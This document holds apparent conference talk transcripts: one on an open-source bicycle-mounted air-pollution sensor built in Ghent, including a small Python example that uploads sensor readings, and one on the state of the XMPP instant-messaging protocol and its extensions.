The city council is taking the environment seriously. That's what they say. So, yeah, we hope that they do; we'll see. There is obviously a lot of frustration with some people, because it might bring the city bad or negative publicity. There's also some negativity from the, how do you call it, the immo? Is it Immo in German as well? The people that sell houses. They are afraid that this information will lower the prices of houses, because usually where the house prices are high, there is also a lot of pollution, because those are the places where there is a lot of traffic, where the buses are, the trams are, things like that. So, it's very convenient, but also very, very, well, dangerous to our health. The most important thing about my presentation is in fact the technical side, because this is a technical conference, and this is what the device looks like. It's going to change a bit, but this is how it looks. It consists of a few things. Let me first talk about the goals we have. We want to create an open device that we can build locally, because the idea is, if we are going to create this, this is not something that is specific to Ghent. Everybody could help on this, could use the same device. So we want to build something that everybody can build themselves. So the components we use should be cheap, should be easy to get your hands on. The code is open source, obviously; the documentation is as open as possible, because we have to write it first. The design of the casing: we're using general things that you can buy everywhere, with 3D-printed pieces. It's a modular design, because obviously people want to have different combinations of things. So the idea is that you can swap drivers, or in some later version we can detect which sensors we have, and we will automatically adapt to that. We try to reuse as much open source as possible, because we have limited resources ourselves as well. And we believe in open source, obviously. And the most important thing is that the data will be open. So it's open for everyone to make use of it. Which also has the danger, or threat, that those people that want to put us in a bad spotlight can obviously use that data and manipulate it as well. And that's why we have to be very careful to indicate what it is, because we're not a scientific project. We measure stuff, but, yeah, the information we gather is raw data; you cannot use it immediately. So we hope that by putting this raw data out, we also attract universities that are going to use this information and do something with it. So we have to be careful, because it's raw data, and as much as we'd like to tell people "walk here and not over there, because that's dangerous", we cannot simply say that. I will go into that when I talk about the sensors as well. So, this is the device. This was the first prototype, when we knew what pieces we were going to use. This is when you're building it and testing stuff. Once you're certain that it works, it looks like this: fewer connections. Well, the connections are actually fixed. What are we using? Those that know a little bit about hardware will have seen some things. We used the SparkFun ESP8266, which is in fact a Wi-Fi chipset. We started off with something different: the original idea was to use Bluetooth for communication and use a normal microcontroller, but this is actually quite affordable, and with Wi-Fi on board we can use Wi-Fi, which is much more convenient for sending data back to our own servers.
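Purely to make the data path concrete: the actual firmware is Arduino-style C++, but pushing one buffered measurement to a collection server over Wi-Fi amounts to something like the following Python sketch. The endpoint URL and the field names are invented for illustration and are not the project's real schema.

```python
import json
import urllib.request

# One raw measurement record, roughly the kind of data the device buffers:
# particle counts (not yet converted to micrograms per cubic meter), position,
# and the supporting temperature/humidity/pressure readings.
record = {
    "device_id": "adam-0001",
    "timestamp": "2016-08-20T14:03:00Z",
    "lat": 51.05, "lon": 3.72,
    "pm10_count": 123, "pm25_count": 45,
    "temperature_c": 21.4, "humidity_pct": 63.0, "pressure_hpa": 1013.2,
}

req = urllib.request.Request(
    "https://example.org/api/measurements",  # hypothetical endpoint
    data=json.dumps(record).encode("utf-8"),
    headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(req) as resp:
    print(resp.status)  # 2xx means the central server accepted the record
```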
Almost all of the sensors are I2C. I don't know if it's... how do you call it? I2C? A lot of things... I2C. Okay, I'll remember that. What did you say? Inter-IC, I see. Okay, I didn't know. Yeah. Let me add a big disclaimer: I'm not the smartest guy in the team we have. I only joined three months ago. I learned all this stuff by doing it. I know I2C a bit now, but I'm not writing the drivers myself. I did write a lot of the code, but not this part. I'm not that experienced with electronics myself, although I'm learning, so it's getting better all the time. We're using the PPD42. It's probably not that well known, because it's very specific to what we're doing. Let me put this down. This is, in fact, the device. The device actually has a resistor underneath that heats the air, which we are probably going to remove because it's also using up a lot of the battery power, and the air is sucked in underneath and pulled out at the top. There is a dark chamber where there's a highly sensitive light sensor. There is a light beam that actually bounces off the fine dust, and we get an interrupt for each particle that we see. If I come back to what I said earlier about the scientific value of this: usually the fine dust values that are used are based on micrograms per cubic meter. This only counts dust particles. Actually, we have two types of dust particles: those that are smaller than 10 micrometers and those that are smaller than 2.5 micrometers. Those are the only two factors that we have. We have to do some calculations, and probably calibration with real devices, to have a sense of how good the air quality is. But it will always be something that is relative to other devices. We cannot say: compared to the official way of measuring, it's this. But because we have fixed stations, and maybe at some point more fixed stations that are calibrated, if a bike crosses those and it senses that information, and we have hundreds of bikes crossing those, we can do statistical analysis of all that information and compare it. Then we can say: this is better, this is worse. We don't know exactly how much better or how much worse. We could know that, but only with some margin of error. But it will not be really scientific, and it cannot be used as raw data anyhow. In the device we need some things to help us. We have an accelerometer to know if we are moving or not. We also use it to see if it's been shaken; I will come back to that as well. Obviously we want to know when we are moving, because we want to go into a low-power mode if we are standing still. If we are not moving, we can also test the Wi-Fi to see if there is a Wi-Fi SSID that we know about, and try to get our data out. Was there something else I wanted to say about the accelerometer? The humidity sensor: there is a humidity sensor on it. In fact, the humidity sensor does temperature too, but the accelerometer has a temperature sensor as well, and the air pressure sensor has a temperature sensor as well, so we have the same information three times. The humidity is important because there is a relation between fine dust and humidity. If we want to take that into account as well, we need this information at the same place and the same time as the other information. Air pressure is the same. With the humidity sensor and the air pressure sensor we also want to see if it's raining, for instance. We don't know if we can get that out of there, but it may help us to get this information.
We could obviously also take into account other weather information that is public, like the wind, where the wind is coming from and the wind speed. At the moment we are not taking that into account, but this is something to correlate as well, so it would be nice to see what the influence of wind at a certain location is on the air pollution. Then we have the biggest troublemaker in our set: the GPS. Why is this a big problem? The GPS requires serial communication. We are limited in the number of pins we have on this SparkFun ESP8266, and it's a pain for us. There are GPS devices that have an I2C interface, and in fact this one has one as well, but we cannot make it work for some reason. We tried to connect those pins, but we cannot make it work. If you look on the internet for I2C GPSes, they all have this electronic stuff in between to convert between serial and I2C. The idea now, with a lot of regret because I want to keep things simple, is that the only affordable way to do this, apart from buying the I2C GPS which is quite expensive (it adds 15 or 20 euros on top of the price we have now), is to use an Arduino Pro Mini and create firmware for it; actually there is a project that creates firmware for serial-to-I2C interfaces, so we are now looking at that, but this is the part that is not implemented yet. In fact, we are using the GPS with a serial interface at the moment, and we don't have a buzzer, and that's how we do it. But actually we need two pins if we also want to talk to the GPS to configure it properly, so actually this is the way to go. Obviously, if you have better ideas... Yes, yes, indeed. The original idea was to only have to read from the GPS, but the problem is it's sending a lot of information, it's buffering, it makes no sense at all. And you can configure the GPS to only give you information every second, or things like that, or you can also say "I only want this type of information" with the more advanced GPSes. But indeed, if we can have this one process the information, we have it in the correct format that we need. The communication of the device, as I will show you later: we are using JSON for communicating everything, well, to the serial console for testing and also to send it out over Wi-Fi. So the information: well, if you want to have the details about how we store the information, we can discuss this later, because we also created something fancy to use as little storage as possible. We are also planning to add an I2C memory, to have more memory for buffering more information, but at the moment, for testing, we don't need it yet. So, as I showed you, this is the current device.
When I joined, there was not a lot of code produced. We did have some test code for the individual sensors. And when I joined, I didn't know what I could help with, so I started with documenting everything, which is nice, because then I knew a little bit about the different sensors and how the project was conceived. But I very quickly started to write the main loop. And the main loop is something that, well, I knew a little bit of Arduino, that you have the setup and the main loop, but I didn't know how to get something like this going. And the first time I tried to implement this, I had a lot of if-else statements, and it was interesting, because it taught me how this would work. But then the second revision became better: we started to use cases. And then I had an epiphany, which is probably very obvious for most of you: to use a state machine. A state machine written with double cases, double switch blocks: one for determining which state we are in and changing states, and the other one to do the state transitions, because we want to run something when we are in one of the states, we want to run something continuously, and if we're going to move from one state to the other, we have to do some preparation or tearing down of stuff while we're moving. And so, if you look at the code, and I can go over that if there's interest and there is time, it looks very neat now, so I learned a lot with that as well. The thing is, when we start the device, the start state is actually not a real state; it's the beginning, it's where we are when we start the device. And we quickly go into sleep mode, and depending on information coming from the sensors we go to different states. So if we're in sleep mode, we're not moving, because if we're moving, we go to the GPS test state. If we're not moving but the device was shaken, we go to the config state, which brings up a Wi-Fi access point that you can connect to, and then you can configure the SSIDs you want to use for uploading your data. You can also say whether the device is stationary or not, because we also want to have non-mobile devices at some point, and we also want to know if the device is located indoors or outdoors, because for the project itself we're only interested in outdoor information, but as a person I would like to know what the information is indoors. So that's something that you can configure in the config state, and after some time, or when OK is pressed or whatever, we go back to sleep. If we are moving, we enable the GPS and we wait until we get sensible information. If we get proper information and the GPS is ready and we're still moving, we go into the collect state. I can show you this, but not here, because I don't have GPS here; but I can show you, because we also added some debugging commands, so through the serial console you can say "GPS is ready" even though it isn't, we fake that we're moving, we fake that we have GPS, and then we can test going through all these states. Same for the Wi-Fi test: if we are not moving and the buffer is not empty, so we have data (we will probably add some periods here, so that from time to time we check for Wi-Fi, because again we want to save the battery as much as possible), we go into the Wi-Fi test. If we have a fix for the Wi-Fi, we upload our information, and then we go back, and we go back to sleep. So it's very easy, and I wish I had this from the beginning. The firmware design: as I stated, the most important thing was code
readability, because we want people to help and to join the project, and to be able to adapt it to their own needs. It's a simple state machine with state transitions, as we call them. Yeah, we want to have I2C bus scanning, which may be possible; it depends, I don't know how unique the IDs are, that's the problem, but maybe for the sensors that we have it's possible, we'll have to see. And then, even if the IDs are not unique, if you know that there are multiple, you can test if it works. And we're working through GitHub, so as I said, everything is open source. We also have individual test examples on GitHub for individual drivers and libraries, to test if our own wrapper libraries for the sensors (usually we have wrapper libraries for sensors) are working correctly, to configure them or do stuff with them. We also have a PCB design, but the first PCB design we have to redo; it looks a bit like this. You can find, how is it called, KiCad? So we have KiCad drawings, but we'll have to redo that. So this is the current status. Before I arrived in the project, they already did a lot of the sensor selection, also for the fine dust sensor; there are a few of them, and they have all been tested together with a calibrated device. So I was not part of that, but that also took a lot of time, to find what the best combination of all that was. And now we are here: we're busy doing the second prototype using the GPS over I2C. We hope to finish this in the next few months. To be honest, we had hoped to finish the first prototype with everything working before the holidays, but we didn't make it, especially because of the GPS; if we had made the I2C GPS pins work, then it could have worked, but it seems it's not that easy to do. Then there is lots of functionality: every time we have a meeting and new people join the meeting, they have the same or new ideas, and it's very nice, but it doesn't bring us to a working device. So while this is very nice, and if you have new ideas, let me know, because I'm going to make a list of them to shortcut those recurring discussions we have, one of the things is, and that's also why we have this accelerometer, that we can measure, if we are on a bike, whether we have lots of bumps. And if lots of bikes have lots of bumps at the same place, we can give this information to those bike organizations that discuss with the government that bike roads should be better. As I said, we want to include more sensor data, or sensor information, although for some of these we already have a lot of devices in Ghent, so some of the information is already available, but may not be open. We want to support outdoor and in-house stationary devices. As I said, we are living very close to the end of the highway; there are lots of traffic jams in front of our house, and so it would be nice to know exactly what to do: should we open the front windows? No, I told my wife never to open them, except maybe specifically in the weekends, or we always use the back windows. But having that data would probably also, for the awareness, get a lot of people thinking about what they should do or how they should handle it. Auto-calibration of devices: I told you, if we pass each other, we could think of that. Not calibrating the device itself, because we only want to have the raw data from the device, but also because, if that information is somehow not usable because the device is somehow broken, we want to know, we want to see that when we're trying to put everything together and do checks of the data quality. There is the idea of
if we have this data, which is already properly manipulated to get real information out of it, we want to be able to have an application that gives you that same information even though you don't have the sensors in your device; that would be nice as well. It would also be nice to know at what times of the day or on what days it's better and on what days it's worse, and stuff like that, or what the influence of the weather is. It would also be nice to be able to show that in real time, for instance to people that are waiting in their traffic jams, causing the traffic jam, so that they see what the quality is; or even have those devices inside of your car, because inside of the car it's also not quite healthy, and if they know that, maybe, if we all start to use the bike, there's no problem anymore. Yeah, well, I'm not sure if it is, because the fine dust, I don't know if they can filter that out, and the ultrafine dust is even worse, and that's what we cannot measure with this equipment, so it's even worse. And if you know that, well, I have some slides, if we have some time, or if there are some questions, after the questions I have some slides about the different types of pollution and the sizes of each, because smoke, cigarette smoke, is very, very bad; it's ultrafine dust in some cases. So yeah. This is the project information if you're interested in maybe joining a residency because you have a nice idea, and this is the Timelab information. Unfortunately, well, it's mostly Dutch, but I think there's some translated stuff. Unfortunately the website of the Adam project, which is the website for the public, that one is in Dutch; on GitHub everything is in English, but for the communication to the citizens it's unfortunately Dutch. But we have Google Translate, I guess. If you're interested in air quality in general where you are living, you can find that information. I don't know what I should do; let's do questions first, and then I can show you some information, because when I said we're doing this in Ghent, there is a good reason why we do it in Ghent. Ghent is one of the worst in Western Europe, so that's why I think it makes sense to do this, together with Antwerp, which is the major, the largest, city in Flanders. There's also an interesting project from Switzerland, which actually predates everything that I found. They have this very massive device with lots of sensors, they're testing almost everything, and they've been put on top of the trams, continuously. I think there's now a second OpenSense project where they're trying to improve what they are doing. But this one is nice, because it gets all the information for all the different pollution types, and you can see that if one is high, usually the others are high as well. So they go together, depending on the source: if it's cars or combustion, then it's usually the same thing. So let me first ask if there are any questions, and then maybe I can show you some more slides with specific information. It's good, yeah: whether an event loop would be better than, well, a sleep loop. I don't know, to be honest. I think for an event loop you have to, I think it wouldn't use more battery, I don't know, I don't know exactly how an event loop would work in this case. It's C++, but it's Arduino kind of C++; they do a lot of things in between to make it easier for children, or for grown-ups too. We are using that, yeah, and I'm not a very good C++ programmer; I can do C, but C++ for me was also something new. But yeah. So apparently there is a university and it's custom.
It has a project like this as well but you couldn't contact with them and it would be nice because it's EU funded it would be nice to share information. I'll look it up. Yeah so the question is specifically to the casing but also to other information what if the conditions change and obviously the information we gather is also based on that yes in this case speed or wind airflow or things like that especially if you have inside a house or stationary devices where you may not have enough airflow to get proper information right. Yes so that's why we want to get the raw data the speed and stuff like that we want to get that also centrally so that we can take that into account but we have to do more testing before we can make any conclusive statements out of that and I'm not a big data or even a statistical engineer that can that knows how this works but we do have people that have that have this background that also are part of invent environmental action groups that have this background and that can do this that are part of the environmental study groups inside of university so they are involved but they're not part of it yet because we don't have data yet at this moment we are not collecting anything so but yes this is something that we have to take into account definitely and for the casing itself we have to make sure that the temperature for instance is outside temperature and not inside temperature we have to make sure that the airflow is good enough in fact the design of the casing will do something and I forgot what the name was but there is this physics I'll have to add that to my presentation for the next time I have to ask my colleagues there is something where you have different denser well different size of the tube that will suck in air there is something in physics that that will cause this and this is what we're going to use as well so that because of I don't know the fact that there is an under pressure somewhere it sucks in air but I'll have to add that to the sorry that I and why would you do that congratulations it's the first time I hear this ID so I'm going to write it down it's interesting as well special for those action groups yeah that would be interesting to have as well yeah it depends it could but it depends on the on the dust from from yeah yeah I think the device cannot cannot see a secret smoke at this moment no it depends on the size of the particles and cigarette smokers I can show you let me show you if we could measure it yes so if you look here at the types of stuff we find in the air so particulate matter is somewhere here in between this so it's dust and I think you see oil smoke is inside of this because we are measuring 10 to 2 and a half is lower than 10 and lower than 2 and a half but I don't know what the what the smallest it depends on the on the light sensor I don't know what the smallest particle is that we can measure that's that's a problem that's something we have to we have to see for ourselves but tobacco smoke you see it's it's lower smoke as well so I think that I don't know I couldn't say we have to test fact is that when we were testing the the the sensor inside of time lap we also tested it with someone smoking and we could see that the smoking also has those particles that are larger so we could see that smoking did have an effect on the sensor but the the question is how much does it influence the smaller you go the deeper it goes into the lungs but also the smaller the particle is so it's it's but it does the smaller you go it the 
better the worse for for the lungs that's effect and it also goes into the blood then so if it's very small I don't know exactly which I read about it but I forgot what size actually but ultra fine dust actually goes into your blood as well so into your bloodstream so it doesn't stick into the lungs but it goes into your whole body yeah yeah that's first it that's a good question we have to we have to find out we have to find out by getting the first devices out and testing how well they they behave compared to calibrated devices yeah something we have to find out the reason why we chose bikes is because we we think it's better than runners for instance where you have a lot of more shocks and probably the device wears out quicker so we hope that bikes are better for that but also because bikes take a longer distance so we can we can measure more so I do we think bikes is a good idea but we will have to see how well the devices can hold up against shocks weather conditions and stuff like that it depends how well our case design will be yeah yeah definitely so in the winter there's a lot of heating from houses I have another slide with sources of pollution let me see if I can find that one yeah that's this one so what what influences pollution obviously industry cars but also indoor heating which which influences the outdoor pollution but if you're cooking candles or very very bad don't use candles in house it's it's I told my wife and we bought those let's divide but it's not the same feeling and but don't use candles in house ventilation in your house also makes a big difference if you're cooking you should open a window especially if in house the pollution is worse than outside but how do you know right also don't open your windows in the evening or during the night because then houses are being warmed you have the heating in your house which causes pollution as well so a lot of people I think traffic jams are solved no no pollution anymore we open the windows that's that's not the case unfortunately early in the morning is probably best but because then the dust settles the pollution fine dust pollution is also worse lower to the ground and up because it settles up obviously so something to take into consideration as well there are very nice studies about the influence on things in Antwerp and again I think I have to finish it but in Antwerp and again there were projects where they they distributed plants for specific period of time and then they did a study on the plants they use this ferromagnetic scientific way of measuring fine dust because fine dust often also has small iron or metal pieces in it and that was a way to see what the pollution was and those studies were very interesting as well because apparently if you if you live on a big road like I'm doing you get a lot of fine dust in front of your house but the street behind it is it depends on the air flow obviously but it's a lot less and that's why I said to open the back side the windows at the back of your house and not in front of your house but obviously if you have a ventilation if you have an old house like ours the ventilation probably screws up any house so there are also natural sources of pollution obviously which you cannot do anything against and cars electrical cars are the future no pollution anymore wrong because the big part of the of the pollution are the tires yeah and the electrical cars are more heavy so they have a lot more pollution from tires but it's better than combustion engines obviously but still 
you had a question yes well the heater we're not going to use because the heater is actually used to get air into it to have an air circulation and since we're moving we're using that and also with this physical with this tube sting that also sucks in air this we think this would help but it's true that to get statistical information out of the sensor we have to measure for 30 seconds or something so in 30 seconds you already have on a bike you can do a lot of meters so that's one of the concerns so the information we get we have to we have to yeah we have to we know where we are that's a good thing and we know where we where we were biking so we have an idea of what we have measured but it will not be a specific place it will be on a road but if we have enough bikes then this will all fade away and we get better results but your rights we don't have that information instantly yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah yeah I'm going I'm definitely going to check but indeed a pump we cannot do we also consider doing something like that but it's it's it's too expensive it's it breaks more easy because it's mechanical and stuff like that so we really want to have something cheap and get awareness first so as I said it's not completely scientific it could be improved but the more data we have the better first how much time do I have it's over so so what did you what slides did you not see but this is additional slides these are the projects that existed the strawberry plants ivy plants there is a new with collection tubes which is more scientific even for I don't know how it's called and or two but what the pricing so the device the price of the device without bulk prices because with bulk prices we can probably make this less but at the moment that's 60 euros and you can see the big the big price consumers and then I also have but I put the slides on on the website if you're interested about air pollution at your location you can find that link and you can you can look it up but yeah as you can see we're living here not very good and it's Italy and Turkey is very bad but also Eastern Europe is also very bad so yeah yeah in general we lose nine months of our life or one year of our life due to air pollution but that's due to air pollution but that's an average of course so could be more if you're a smoker it could add up to years of your life if you're unlucky if you're lucky you can become 100 years
|
The aim of this project is to create a device that collects air pollution data (PM2.5 and PM10 fine dust) and is mounted on bicycles to crowdsource factual air pollution information in and around the city of Ghent, Belgium.
|
10.5446/32401 (DOI)
|
Welcome to the session after lunch. Daniel Gultsch is going to talk to us, or tell us some things, about messaging and XMPP and the exciting world around it. A reminder: this is being recorded, so if you've got any problems, be advised, we are recording this. Lots of fun. Over to you, Daniel. Thank you. Welcome to my talk: settling the IM war, creating an open federated instant messaging protocol. Something about me. I'm Daniel Gultsch. I'm primarily known right now for being the primary developer of the Android XMPP client Conversations. This works just like a regular instant messenger, but it relies on open, federated standards. But this is not going to be an advertisement talk about Conversations, so I'm just going to say this once: check it out, it's an awesome client, conversations.im. But only after my talk. I'm also a little bit involved in the broader XMPP community. I'm in regular contact with other developers and at the regular meetings where the XMPP community meets up and discusses the changes. If you want to know more about me, I have a website, gultsch.de. But enough about me. Who here uses more than one instant messaging client? Okay. So, more than three? Okay. Yeah, still a lot. Any of you using Conversations already? Okay. So that's awesome. Well, there have always been a lot of competing instant messaging services. Back in the day, for example, we had ICQ, MSN, and a couple more. However, in recent years something changed. First of all, instant messaging became more and more important. Instead of turning on our computers once a day and quickly checking our emails or seeing who is online on ICQ, we are now online 24/7. And instant messaging just became a very convenient form of communication. It's less obtrusive than a telephone call, for example, but it still allows for a fairly natural way of communication. The second thing that changed was that the number of available instant messengers exploded. We are now at a point where even trying to name all of them is a sheer impossible task. Well, that's not a problem, you might think, as long as everybody uses WhatsApp. But in fact, not everybody does. First of all, "everybody uses WhatsApp" is a sort of European view on it. If you look at other parts of the world, the market share of WhatsApp is not as significant. And the significance of WhatsApp further diminishes if you start looking at what kind of instant messaging solutions you are using at work. At work, tools like Slack, HipChat, or even Skype become more important. However, at the end of the day, all those tools do pretty much the same thing. That's why there's huge demand for the so-called multi-protocol clients like Pidgin, for example, or Trillian, which is popular on Windows, or the latest one called Franz, which incorporates all those web clients in one UI. So this leaves us with the question of why there isn't a standard protocol for instant messaging that would make all those services interoperable. Well, actually, there is. Such a standard actually exists, and it has for more than a decade. It's called XMPP, which is short for Extensible Messaging and Presence Protocol. And I'm not going to go into too many technical details. The key thing to remember is that it's extensible. So at a very low level, you are just able to exchange messages between two devices, and at a higher level, you can build almost everything on top of it. The basic protocol is an IETF standard, and the extensions are formalized as so-called XEPs by the XMPP Standards Foundation.
Because of those extensions, XMPP can keep up with the changing requirements that naturally occur over time. I've already talked a lot about the specific extensions you need to build a full-fledged instant messaging solution, for example in my last year's talk at FrOSCon called "XMPP 2015: Challenges of Modern Instant Messaging", and more recently in an essay called "The State of Mobile XMPP in 2016". If you want to know more about the technical details, go check those out; they are linked from my website. Who has read my essay or been to last year's talk? Okay, a lot of people. The rest of you should definitely check them out if you are interested in the technical details and are not just an end user; if you're an end user, you probably shouldn't have to care about all this. I ended last year's talk with the statement that with XMPP you are now able to send an encrypted message, which can also be an image, to someone who uses multiple devices, and some of those devices can even be offline. This might not sound too revolutionary, but the Facebook Messenger, for example, which recently introduced end-to-end encryption, still fails to do this: when you turn on end-to-end encryption in the Facebook Messenger, you have to select one specific device. To get to that point, we had to introduce two new extensions. One was called HTTP Upload, which shifted away from the traditional peer-to-peer method of file transfer in XMPP — where you can only exchange files from one specific device to another specific device — to a method where you upload the file, an image for example, to the server and then just distribute the link to the other devices and to the contact. The other extension we introduced is capable of encrypting to multiple devices; it's called OMEMO. Last August, at the time of my talk, the only client capable of OMEMO was Conversations. During the past year, HTTP Upload has seen a pretty huge adoption rate; several clients and servers now have native support for it. OMEMO, however, is in a slightly more complicated situation. The good news first: last December we released a very basic plug-in for the desktop client Gajim, at which point the multiple-device aspect of OMEMO actually started to make sense. Unfortunately, OMEMO suffers from one big problem. Because it involves encryption, multiple devices, fingerprints and so on, implementing it can take several days, if not weeks. And in a world where development is mostly done by volunteers, it makes a huge difference whether something can be implemented in an afternoon or is a week-long commitment. Something like HTTP Upload, which can easily be implemented in an afternoon, gets adopted pretty quickly, especially because you immediately see the results. With OMEMO, on the other hand, you spend days just preparing stuff and setting up the infrastructure before you are able to send a simple "hello world". And I'm fairly certain the OMEMO plug-in for Gajim only happened because we did the initial work ourselves. I didn't mind putting in the work, because I have a commercial interest in it and I don't care if it's frustrating for a couple of days. After that, someone else actually took over, because once you have the basis it's easier to proceed in incremental steps, fixing bugs or doing UI improvements and so on.
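As a rough illustration of the HTTP Upload idea (upload the file once, then just share a link that every device can fetch later), here is a hedged sketch. The slot negotiation, which XEP-0363 defines as an XMPP query to the server, is stubbed out as a hypothetical request_upload_slot() helper, because its exact form depends on the client library; only the HTTP side is shown concretely, using the requests library:

    import requests

    def share_image(xmpp_client, recipient, path):
        # Hypothetical helper: performs the XEP-0363 negotiation and returns
        # a one-time PUT URL plus the public GET URL for the file.
        put_url, get_url = request_upload_slot(xmpp_client, path)
        with open(path, "rb") as fh:
            # Upload the file once to the server ...
            resp = requests.put(put_url, data=fh,
                                headers={"Content-Type": "image/jpeg"})
            resp.raise_for_status()
        # ... then simply distribute the link; offline devices pick it up later.
        xmpp_client.send_message(mto=recipient, mbody=get_url, mtype="chat")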
And the only other OMEMO implementation on the horizon right now is the one in ChatSecure, which is also not being developed by volunteers but by paid developers, thanks to funding from the US government. If you look at the progress Conversations has made in its two years of existence, it becomes clear that there aren't any unsolvable technical problems: you can easily build on existing extensions or, if that's not possible, introduce your own. So it's not really about missing features. What other problems might there be? Some say it's fragmentation: with an open standard you always have clients that implement only a minor subset. Give me a second. Well — it is an open standard, so there's nothing stopping you from creating a very basic client that is barely capable of sending messages and calling yourself an XMPP client. Such clients will always exist, and if they gain some popularity, there's a chance they put XMPP in a bad light. However, for the developers who are actually interested in creating a good, state-of-the-art client, there are the so-called compliance suites that help a newcomer navigate the jungle of various extensions. These meta-extensions, like the XMPP Compliance Suites 2016, point the developer to only a handful of extensions and basically say: implement those and you're fine. So that is the client side. When we start talking about fragmentation on the server side, we have to distinguish between the server implementations and the actual installations. The three major server implementations aren't actually that fragmented; they all share more or less the same feature set. But if you look at the actual installations that are out there, you get a different picture. We often see this problem with users stopping by our support channel and asking: why doesn't feature X work for me? And for a long time the answer has always been: it's just your server that doesn't support it; Conversations is perfectly capable of handling this, it's the fault of your server. But this is still a major issue, because the end user really doesn't care whether it's the server or the client — they just want it to work. So why don't those installations offer those features? Most servers are run by volunteers, and it's safe to assume they are not willingly holding back those features. Most of the extensions don't put any additional load or pressure on the server; it's usually just a matter of enabling them, or of simply not using the extremely outdated version from the Debian repository, for example. So how do we fix this? Well, we first have to make the problem visible. A couple of months ago I wrote a small tool that connects to your XMPP server and simply checks for the features. Originally it was meant as a kind of self-assessment tool that you run against the server you operate, to check whether it supports those extensions. But you can also gather information from more servers and collect it in some kind of list. So that is what I did: I created accounts on various servers and made an overview of which extension is enabled on which server. And when you do this, you see a lot of missing features, marked in red on this diagram, on a lot of servers. So what do you do now? How do you convince a server operator to enable those features? Well, what I did was try asking them.
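The checker tool and the ranked list can be pictured as something like the following hedged sketch, where probe_server() is a hypothetical stand-in for the service discovery (XEP-0030) query the real tool performs against each domain, and the XEP list is only an illustrative subset:

    # Rank public servers by how many of the checked extensions they advertise.
    CHECKED_XEPS = {
        "XEP-0163": "Personal Eventing (PEP)",
        "XEP-0198": "Stream Management",
        "XEP-0313": "Message Archive Management",
        "XEP-0352": "Client State Indication",
        "XEP-0363": "HTTP File Upload",
    }

    def rank_servers(domains):
        scores = []
        for domain in domains:
            supported = probe_server(domain)   # hypothetical: returns a set of XEP ids
            scores.append((len(supported & set(CHECKED_XEPS)), domain))
        # Highest score first: a simple incentive for operators to catch up.
        return sorted(scores, reverse=True)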
So I spent an afternoon looking up the contact information of a couple of bigger servers and just sent them an email saying: hey, XMPP has evolved a lot, we now have those extensions that need to be enabled on the server, and your server actually supports them — you just have to turn them on. And if you want a more convincing argument, or to give the server operator some incentive to actually do this, try gamification: if you order this graph by supported features instead of alphabetically, you get a nice little high-score system, and every server operator wants to be on top of some list. This is something where every one of you can actually help; you don't need any programming skills. Just go to this list, pick a server from far down that doesn't support any of the extensions, and send them an email or mention them on Twitter and ask them to enable those extensions. So what other problems are there? Another argument that is usually made against XMPP in particular, or more generally against other standards and open protocols, is that they slow down your development process. But this is actually not true. You don't have to wait for something to be a standard to implement it: you can implement it first and try to standardize it afterwards. Every half-decent programmer should write down what they're trying to do anyway and document it in some way, and if you modify that existing documentation, you are already halfway to an official extension. Chances are that during the process of standardization the protocol will evolve a little and be adapted so other people get their needs covered as well, but usually it doesn't change in a way that makes it impossible to adapt your implementation. And even if standardizing those extensions is a little bit of extra trouble, it's still far better than implementing an entire IM protocol. A lot of extensions actually came to be like this. Google, for example, originally introduced Jingle, the session initialization you need to do voice-over-IP or video calls, and this later evolved into the official Jingle extension. The original Google Talk client also had an extension called Google Queue, which limited the battery consumption the client generates when in the background; this extension, with a few modifications to the syntax, later became Client State Indication. Unfortunately, this process can become annoying if you're waiting for someone else to publish an extension. The primary example of this is the MIX story. XMPP has always had an extension for group chat called MUC, multi-user chat. MUC looks a bit like IRC and has a very extensive permission model with moderators, participants, visitors and so on. For some time now the broader XMPP community has agreed that MUC isn't really suited for private group chats in the style of WhatsApp or Hangouts and should be replaced with something else. In fact, last year, during the question section of my talk, I was asked about OMEMO and group chat, and my response was that we have to wait for MIX. MIX at that time was in very early planning stages, and, without going into technical details, we still don't have a proper implementation. Well, there are a number of reasons for this.
The number one reason is that MIX is just a very vast extension: it sets out to cover the use cases of the next decade, and a lot of people are trying to get their use cases covered. But the more frustrating reason, to some people, was that MIX was primarily written down by one or two people from the same company. While the requirements and the features that MIX was supposed to have were discussed publicly, and everyone could get their wishes in, the actual writing happened behind closed doors, and any offer to help out or to speed up the process was rejected. This left a lot of people who desperately needed a replacement for MUC uncertain about if and when it was going to happen. As a result, we saw two different proposals for other group chat extensions that were basically variants of MUC. However, it is rather unlikely that those extensions will ever become a standard, because everyone else is still waiting for MIX. I was also waiting for MIX, so what I did was re-read the MUC standard and come up with a solution to get my OMEMO group chats covered with this old thing, MUC — let's say using MUC in a way that no one has before and stretching some of the definitions in the standard. But it got to a point where it was actually usable, with some limitations. The primary limitation is that to engage in a group chat, you have to have everyone in your roster, your personal contact list. But this still works fine; especially for those small group chats, you're usually just chatting with your friends, and you have those individual contacts in your contact list anyway. So I'm now at a point where I can wait more patiently for MIX to happen, because I no longer have the pressure of actually needing a solution — I already have a workaround. And yes, of course, using MIX will make a lot of things easier and definitely more bulletproof, but it's fine for now. Just last week the people who are writing MIX actually published a huge progress update to the standard, so we might see first implementations of MIX pretty soon. So if XMPP is such a fine protocol, why doesn't it get used more often? Well, I'm not the one who makes the decisions at Google or Facebook or WhatsApp, so I can merely speculate on the reasons. Some companies — Google or Open Whisper Systems, for example — at some point actually issued statements on why they're not using XMPP. However, those statements, like every statement made by a marketing department, should be taken with a grain of salt. The arguments from Open Whisper Systems for not using XMPP, for example, are actually just incorrect. So what other reasons are there for a company not to use XMPP? To answer that, let's take a step back first and look at the companies who actually do use XMPP. While they might not actively advertise it, WhatsApp actually does use XMPP. Of course, over time they introduced a couple of extensions, the most prominent being the compression layer that optimizes XMPP for use on mobile devices, which is what they primarily set out to do. But they decided not to publish and standardize those extensions. And before we speculate on the reasons why WhatsApp doesn't do this, let's look at some other companies or organizations that do use XMPP. For example, NATO. NATO uses a lot of XMPP.
